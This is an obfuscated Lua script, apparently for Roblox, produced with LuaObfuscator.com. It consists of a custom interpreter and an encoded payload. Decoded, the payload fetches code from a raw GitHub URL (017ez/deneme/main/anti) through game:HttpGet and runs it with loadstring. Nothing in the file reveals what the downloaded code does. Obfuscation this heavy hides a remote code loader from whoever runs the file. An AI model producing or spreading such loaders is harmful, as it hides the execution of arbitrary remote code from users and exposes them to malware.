--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.2) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==3) then v13=select;v14=unpack or table.unpack;v15=tonumber;v16=nil;v0=4;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end;v11=setmetatable;v12=pcall;v0=3;end if (v0==4) then v16=function(v25,v26,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==5) then v39=nil;v39=function(v40,v41,v42)local v48=v40[1];local v49=v40[2];local v50=v40[3];return function(...)local v76=1;local v77= -1;local v78={...};local v79=v13("#",...) -1;local function v80()local v81=v48;local v82=v49;local v83=v50;local v84=v37;local v85={};local v86={};local v87={};for v96=0 + 0,v79 do if ((v96>=v83) or (3174>=(5457 -2189))) then v85[v96-v83]=v78[v96 + 1];else v87[v96]=v78[v96 + (1417 -(232 + 1184)) + 0];end end local v88=(v79-v83) + 1 + 0;local v89;local v90;while true do local v97=(2196 -(341 + 781)) -(875 + 199);local v98;local v99;while true do if ((v97==(0 + 0)) or ((4812 -2428)==(2757 + 131))) then v98=1173 -(415 + (2901 -2143));v99=nil;v97=2 -1;end if (((4299 -(640 + 997))<(10204 -(1433 + 5431))) and (v97==1)) then while true do if (((958 + 197 + 18)>(1904 -(6 + 1796))) and (v98==(330 -((1078 -(264 + 784)) + (623 -323))))) then v99=1688 -(1140 + 548);while true do if (((130 + 485)<(5432 -(521 + 289))) and (v99==(0 -0))) then local v115=1844 -(963 + 881);while true do if ((v115==(1 + 0)) or ((3125 -((3595 -2536) + 607 + 200))>=(3406 + 315 + 677))) then v99=1 + 0;break;end if (((1298 -(484 + 398))<(18347 -(14791 -(193 + 401)))) and (v115==(0 -0))) then v89=v81[v76];v90=v89[1965 -(668 + 1296)];v115=1;end end end if (((780 + (1697 -(280 + 204)))<(11258 -6399)) and (1==v99)) then if (((474 + 607)>(929 -(395 + 9))) and (v90<=(3 + 0))) then if (((560 + 2157)>(4531 -(8717 -6461))) and (v90<=(1 + 0))) then if ((v90==0) or ((4735 -2753)<=(2947 -((2278 -1720) + 1405)))) then local v122=0 + 0 + 0;local v123;local v124;while true do if (((10826 -7190)==(1166 + 2470)) and (v122==(1649 -(1526 + 122)))) then while true do if ((v123==(0 -0)) or (2757>=2990)) then v124=v89[2];v87[v124]=v87[v124](v14(v87,v124 + (1363 -(1120 + 242)),v77));break;end end break;end if (((0 + 0)==v122) or ((7001 -(3684 -(224 + 61)))==(28 + 4312))) then v123=0;v124=nil;v122=1 + 0;end end else v87[v89[1167 -(58 + 1107)]]=v89[3];end elseif ((((4617 + 1216) -4098)==(2590 -(322 + 533))) and (v90>(1480 -(648 + 830)))) then local v127=0 + 0;local v128;local v129;local v130;while true do if ((0==v127) or ((365 + 101)>4555)) then v128=0 + 0;v129=nil;v127=259 -(228 + 30);end if ((v127==(1 + 0)) or ((2324 -1464)==6)) then v130=nil;while true do if (((922 -(789 + 18))<=(3033 -((2450 -(353 + 1381)) + 541))) and ((1302 -(812 + 489))==v128)) then v87[v129 + (1 -0)]=v130;v87[v129]=v130[v89[4]];break;end if ((v128==(0 -0)) or ((4952 -(485 + 109))<(8857 -5579))) then v129=v89[1 + 0 + 1];v130=v87[v89[11 -(349 -(133 + 208))]];v128=1;end end break;end end else v87[v89[6 -4]]();end elseif (((16542 -12376)>=((1749 -(318 + 746)) + 1788)) and (v90<=(5 + 0))) then if ((v90>(3 + 1)) or ((1078 -(430 + 593))>=(492 + 231))) then do return;end else local v131=0 + 0;local v132;local v133;local v134;local v135;local v136;while true do if ((v131==1) or ((3131 -1698)>(5377 -3362))) then v134=nil;v135=nil;v131=1534 -(289 + 1243);end if (((11705 -7680)>2288) and (2==v131)) then v136=nil;while true do if (((8823 -6410)>(210 + 2007)) and (v132==(1 + 0))) then local v154=0;while true do if ((v154==(0 + 0)) or ((839 + 1847 + 1225)<(6713 -3503))) then v77=(v135 + v133) -(2 -1);v136=0 + 0;v154=1 + 0;end if (((2390 + 1614)>=(16075 -12320)) and (v154==1)) then v132=5 -3;break;end end end if ((v132==(4 -2)) or ((1369 -(386 + 1))>(4200 -(1364 + 174)))) then for v159=v133,v77 do local v160=1368 -(263 + 1105);local v161;while true do if ((v160==(183 -(68 + 115))) or (((2475 -(204 + 1651)) + 3761)<=(5259 -(1440 + 162)))) then v161=0 -0;while true do if (((981 + 3717)>=(5234 -4062)) and (v161==(0 -0))) then v136=v136 + 1 + 0;v87[v159]=v134[v136];break;end end break;end end end break;end if ((0==v132) or ((6817 -2310)<=(2968 + 270))) then v133=v89[6 -4];v134,v135=v84(v87[v133](v14(v87,v133 + 1 + 0,v89[3])));v132=(2 -1) -0;end end break;end if (((0 + 0)==v131) or ((4697 -((1975 -(497 + 1079)) + 135))<(1013 -534))) then v132=0 + 0;v133=nil;v131=1;end end end elseif ((v90>(8 -2)) or (2653<=(671 -((1141 -(136 + 740)) + 351)))) then v87[v89[2 + (1886 -(1588 + 298))]]=v89[1 + 2]~=(0 + 0);else v87[v89[5 -3]]=v42[v89[2 + 1]];end v76=v76 + (1795 -(723 + 1071));break;end end break;end end break;end end end end A,B=v37(v12(v80));if  not A[1] then local v100=v40[4][v76] or "?";error("Script error at ["   .. v100   .. "]:"   .. A[2]);else return v14(A,2,B);end end;end;return v39(v38(),{},v26)(...);end if (v27==0) then v28=1;v29=nil;v25=v5(v4(v25,5),"..",function(v43)if (v2(v43,2)==79) then v29=v1(v4(v43,1,1));return "";else local v91=0;local v92;while true do if (v91==0) then v92=v3(v1(v43,16));if v29 then local v114=v6(v92,v29);v29=nil;return v114;else return v92;end break;end end end end);v30=nil;v27=1;end if (1==v27) then v30=function(v44,v45,v46)if v46 then local v93=0 + 0;local v94;while true do if ((1917 -(719 + 1198))==v93) then v94=(v44/((1 + 1)^(v45-((1745 -(1508 + 236)) + 0))))%((9 -7)^(((v46-(1 + 0)) -(v45-(4 -3))) + (2 -1)));return v94-(v94%(1 + 0));end end else local v95=2^(v45-(291 -(24 + 266)));return (((v44%(v95 + v95))>=v95) and 1) or (0 + 0 + 0);end end;v31=nil;v31=function()local v51=v2(v25,v28,v28);v28=v28 + 1;return v51;end;v32=nil;v27=2;end if (v27==2) then v32=function()local v52=0 + 0;local v53;local v54;while true do if (v52==(0 -0)) then v53,v54=v2(v25,v28,v28 + 2);v28=v28 + (2 -0) + 0;v52=3 -(965 -(716 + 247));end if (v52==(1 + (0 -0))) then return (v54 * (143 + 113)) + v53;end end end;v33=nil;v33=function()local v55,v56,v57,v58=v2(v25,v28,v28 + (12 -9));v28=v28 + 3 + 1;return (v58 * 16777216) + (v57 * (24093 + 41443)) + (v56 * 256) + v55;end;v34=nil;v27=3;end if (v27==3) then v34=function()local v59=v33();local v60=v33();local v61=1711 -(1323 + 387);local v62=(v30(v60,1 + 0,4 + 16) * ((4 -2)^(86 -54))) + v59;local v63=v30(v60,(2486 -1613) -(297 + 555),72 -41);local v64=((v30(v60,26 + 6)==(1 -0)) and  -(1 + 0)) or (1270 -(912 + 357));if (v63==(0 -0)) then if (v62==(0 -0)) then return v64 * (1512 -(235 + 1277));else local v103=0 -(371 -(329 + 42));while true do if (v103==0) then v63=941 -((966 -(215 + 117)) + 306);v61=0 -(1368 -(843 + 525));break;end end end elseif (v63==(1215 + 832)) then return ((v62==((0 -0) + 0)) and (v64 * ((1725 -(1197 + 527))/(249 -(42 + 207))))) or (v64 * NaN);end return v9(v64,v63-(1472 -449)) * (v61 + (v62/(((6005 -4742) -(467 + 794))^52)));end;v35=nil;v35=function(v47)local v65=0 -0;local v66;local v67;while true do if (v65==(6 -(3 + 1))) then v67={};for v104=1, #v66 do v67[v104]=v3(v2(v4(v66,v104,v104)));end v65=6 -3;end if (v65==3) then return v7(v67);end if (((0 -0) + 0)==v65) then v66=nil;if  not v47 then v47=v33();if (v47==(1608 -(1350 + 258))) then return "";end end v65=1;end if ((1 -0)==v65) then v66=v4(v25,v28,(v28 + v47) -((3 -2) -0));v28=v28 + v47;v65=1610 -(796 + 812);end end end;v36=v33;v27=4;end if (v27==4) then v37=nil;v37=function(...)return {...},v13("#",...);end;v38=nil;v38=function()local v68=503 -(388 + 115);local v69;local v70;local v71;local v72;local v73;local v74;local v75;while true do if (v68~=(1899 -(563 + 1335))) then else v71=nil;v72=nil;v68=2;end if (v68~=0) then else local v101=0;while true do if (v101==1) then v68=1;break;end if (0~=v101) then else v69=0 + 0;v70=nil;v101=1 -0;end end end if (v68~=2) then else local v102=0;while true do if (v102==1) then v68=3 -0;break;end if (v102~=0) then else local v113=0 + 0;while true do if (v113==1) then v102=1;break;end if ((0 + 0)==v113) then v73=nil;v74=nil;v113=1 -0;end end end end end if (v68==(2 + 1)) then v75=nil;while true do local v106=0 -0;local v107;local v108;while true do if (v106==1) then while true do if (v107==0) then v108=0;while true do if (1==v108) then if (v69==2) then local v119=0 + 0;local v120;local v121;while true do if (v119~=0) then else v120=0;v121=nil;v119=1 + 0;end if (v119~=(858 -(46 + 811))) then else while true do if (v120==(494 -(189 + 305))) then v121=0;while true do local v146=0 + 0;while true do if (v146~=(200 -(191 + 9))) then else if (0==v121) then local v167=0;local v168;while true do if (v167==(0 -0)) then v168=0;while true do if (v168==1) then v121=1;break;end if (v168~=(0 -0)) then else local v175=0;while true do if (0==v175) then for v176=1 + 0,v33() do local v177=0;local v178;while true do if (v177==0) then v178=v31();if (v30(v178,1,1470 -(496 + 973))==0) then local v181=1400 -(1108 + 292);local v182;local v183;local v184;local v185;local v186;while true do if (v181==1) then v184=nil;v185=nil;v181=3 -1;end if (v181==2) then v186=nil;while true do if (v182==(1 + 0)) then local v187=0 + 0;while true do if (v187==0) then v185=nil;v186=nil;v187=1 + 0;end if (v187~=(1 + 0)) then else v182=2;break;end end end if (v182~=(1079 -(71 + 1006))) then else while true do if (v183==3) then if (v30(v185,3 + 0,1833 -(134 + 1696))~=1) then else v186[3 + 1]=v75[v186[1949 -(1755 + 190)]];end v70[v176]=v186;break;end if (v183==0) then local v190=0 -0;local v191;local v192;while true do if (v190==(78 -(9 + 68))) then while true do if (v191~=0) then else v192=152 -(113 + 39);while true do if (v192==0) then local v203=0 + 0;while true do if (v203==0) then v184=v30(v178,2 + 0,3);v185=v30(v178,4,6);v203=1 + 0;end if (v203==(1 + 0)) then v192=1 + 0;break;end end end if (v192==1) then v183=1;break;end end break;end end break;end if (v190==0) then v191=0;v192=nil;v190=1 + 0;end end end if ((1 -0)~=v183) then else local v193=0 + 0;local v194;while true do if (v193==0) then v194=0;while true do if (0==v194) then local v201=0 -0;local v202;while true do if (v201==(0 -0)) then v202=0 -0;while true do if (v202~=(1555 -(581 + 973))) then else v194=1;break;end if (v202~=(1379 -(769 + 610))) then else local v205=0;while true do if (v205==(803 -(304 + 498))) then v202=1490 -(660 + 829);break;end if (v205==0) then v186={v32(),v32(),nil,nil};if (v184==(0 + 0)) then local v210=0;local v211;while true do if (v210~=(0 + 0)) then else v211=0 + 0;while true do if (v211~=(0 + 0)) then else v186[3]=v32();v186[4]=v32();break;end end break;end end elseif (v184==(645 -(111 + 533))) then v186[3 + 0]=v33();elseif (v184==(7 -5)) then v186[1 + 2]=v33() -((1 + 1)^16);elseif (v184==3) then local v216=362 -(227 + 135);local v217;while true do if (v216==(513 -(181 + 332))) then v217=1161 -(183 + 978);while true do if (0==v217) then v186[2 + 1]=v33() -((1 + 1)^(63 -47));v186[4]=v32();break;end end break;end end end v205=1046 -(699 + 346);end end end end break;end end end if (v194==1) then v183=2;break;end end break;end end end if (v183==2) then local v195=0;local v196;local v197;while true do if ((0 -0)==v195) then v196=0;v197=nil;v195=1;end if (v195~=(3 -2)) then else while true do if (v196~=(650 -(326 + 324))) then else v197=1651 -(720 + 931);while true do if (v197==0) then local v204=728 -(585 + 143);while true do if (1~=v204) then else v197=1;break;end if (v204==(0 + 0)) then if (v30(v185,1,1)~=1) then else v186[123 -(29 + 92)]=v75[v186[789 -(151 + 636)]];end if (v30(v185,2,2)~=(1 + 0)) then else v186[3]=v75[v186[3]];end v204=1;end end end if (v197==1) then v183=3;break;end end break;end end break;end end end end break;end if (0==v182) then local v188=868 -(649 + 219);while true do if (v188==1) then v182=1973 -(956 + 1016);break;end if (v188==(0 + 0)) then local v198=0;while true do if (v198==(0 + 0)) then v183=0 + 0;v184=nil;v198=1;end if (v198==1) then v188=1;break;end end end end end end break;end if ((0 -0)~=v181) then else v182=0 + 0;v183=nil;v181=1;end end end break;end end end for v179=1,v33() do v71[v179-(1 + 0)]=v38();end v175=1;end if ((332 -(18 + 313))==v175) then v168=1;break;end end end end break;end end end if (v121==(1800 -(227 + 1572))) then local v169=0;while true do if (v169==(0 + 0)) then for v172=857 -(633 + 223),v33() do v72[v172]=v33();end return v73;end end end break;end end end break;end end break;end end end break;end if (v108~=(0 -0)) then else local v116=0 + 0;while true do if ((908 -(308 + 600))==v116) then if (v69~=0) then else local v140=0 -0;while true do if ((6 -4)~=v140) then else v69=1 + 0;break;end if (v140==(0 + 0)) then local v143=1346 -(1258 + 88);local v144;while true do if (v143==(217 -(203 + 14))) then v144=198 -(188 + 10);while true do if (v144~=(1402 -(1388 + 13))) then else v140=1;break;end if (v144~=0) then else v70={};v71={};v144=1;end end break;end end end if (v140==(1 + 0)) then local v145=1029 -(68 + 961);while true do if (v145==(0 + 0)) then local v156=0;while true do if ((0 -0)==v156) then v72={};v73={v70,v71,nil,v72};v156=1 + 0;end if (v156==(1 + 0)) then v145=1 + 0;break;end end end if (v145==1) then v140=2;break;end end end end end if (v69==(2 -1)) then local v141=0;local v142;while true do if (v141==0) then v142=0;while true do if (v142~=0) then else local v157=0 + 0;while true do if (v157==(418 -(301 + 116))) then v142=2 -1;break;end if (v157==(1181 -(675 + 506))) then v74=v33();v75={};v157=1108 -(492 + 615);end end end if (v142==(1457 -(460 + 995))) then v69=1 + 1;break;end if (v142~=1) then else for v162=1935 -(1847 + 87),v74 do local v163=982 -(471 + 511);local v164;local v165;local v166;while true do if (v163==(0 + 0)) then v164=0;v165=nil;v163=570 -(182 + 387);end if (v163==1) then v166=nil;while true do if (v164~=(0 -0)) then else v165=v31();v166=nil;v164=1 + 0;end if (v164==(1 + 0)) then if (v165==1) then v166=v31()~=0;elseif (v165==(1 + 1)) then v166=v34();elseif (v165~=(4 -1)) then else v166=v35();end v75[v162]=v166;break;end end break;end end end v73[3]=v31();v142=104 -(80 + 22);end end break;end end end v116=1;end if (v116==1) then v108=1 -0;break;end end end end break;end end break;end if (0==v106) then v107=0;v108=nil;v106=1 + 0;end end end break;end end end;v27=5;end end end;v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403383O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F303137657A2F64656E656D652F6D61696E2F616E746900093O0012063O00013O001206000100023O002003000100010003001201000300044O0007000400014O0004000100049O0000022O00023O000100012O00053O00017O00093O00023O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end end end
